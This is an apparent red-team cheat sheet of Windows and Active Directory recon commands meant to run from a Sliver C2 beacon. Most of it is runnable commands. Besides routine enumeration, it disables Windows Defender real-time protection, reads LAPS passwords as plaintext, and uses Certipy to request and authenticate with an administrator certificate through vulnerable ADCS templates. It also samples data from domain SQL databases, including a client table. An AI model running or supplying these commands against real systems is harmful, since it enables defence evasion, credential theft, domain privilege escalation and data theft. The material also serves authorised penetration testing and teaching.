Recon
Windows recon
Some commands are meant to be executed from a Sliver beacon but can easily be used on other C2 frameworks as well with minimal changes.
- Windows Defender
Get-MpComputerStatus
# or
sc query windefend
BONUS: Disable Defender
Set-MpPreference -DisableRealtimeMonitoring $true
- Applocker policies
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
- Powershell language mode
$ExecutionContext.SessionState.LanguageMode
- LAPS
Find-LAPSDelegatedGroups
Find-AdmPwdExtendedRights
Get-LAPSComputers
BONUS: Read LAPS password (if possible)
Get-LapsADPassword -Identity COM -AsPlainText
- Go-to Sharphound command
sharp-hound-4 -i -s -t 100 -- -c All
- Get list of domain users
sharpview -t 1000 -- Get-DomainUser -Domain eu.junon.vl -Properties samaccountname
- Simple privesc check
sharpup audit
- Check if a proxy is enabled (Powershell)
[System.Net.WebProxy]::GetDefaultProxy()
- Get named pipes
get-childitem \\.\pipe\
[System.IO.Directory]::GetFiles("\\.\\pipe\\")
(get-childitem \\.\pipe\).FullName
- Certipy ADCS enumeration, request and authentication
certipy find -username username@domain.com -password password -vulnerable -stdout
# or
certipy find -username username@domain.com -password password -vulnerable --old-bloodhound
certipy req -u 'usename@domain.com' -p 'password' -dc-ip 10.10.10.10 -ca 'name-DC-CA' -template 'templateName' -upn 'administrator@domain.com' -target 'DC.domain.com' -key-size 4096
certipy auth -pfx administrator.pfx -dc-ip '10.10.10.10' -username 'administrator' -domain domain.com
- Seatbelt (useful commands)
execute-assembly -i -E seatbelt.exe -group=system
execute-assembly -i -E seatbelt.exe InternetSettings
- Windows Services
sc query
Get-Service | fl
- Domain trusts
# powerview
Get-DomainTrust -Domain domain.com
Get-ADTrust -Filter *
nltest /domain_trusts
- Enumerate domain shares
Find-DomainShare -ComputerDomain domain.com -CheckShareAccess
- Enumerate databases
Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "KEYWORD" -SampleSize 5 | select instance, database, column, sample | ft -autosize
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select * from information_schema.tables')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select column_name from master.information_schema.columns')"
Get-SQLQuery -Instance "HOSTNAME,1433" -Query "select * from openquery(""HOSTNAME"", 'select top 5 OrgNumber from master.dbo.VIPClients')"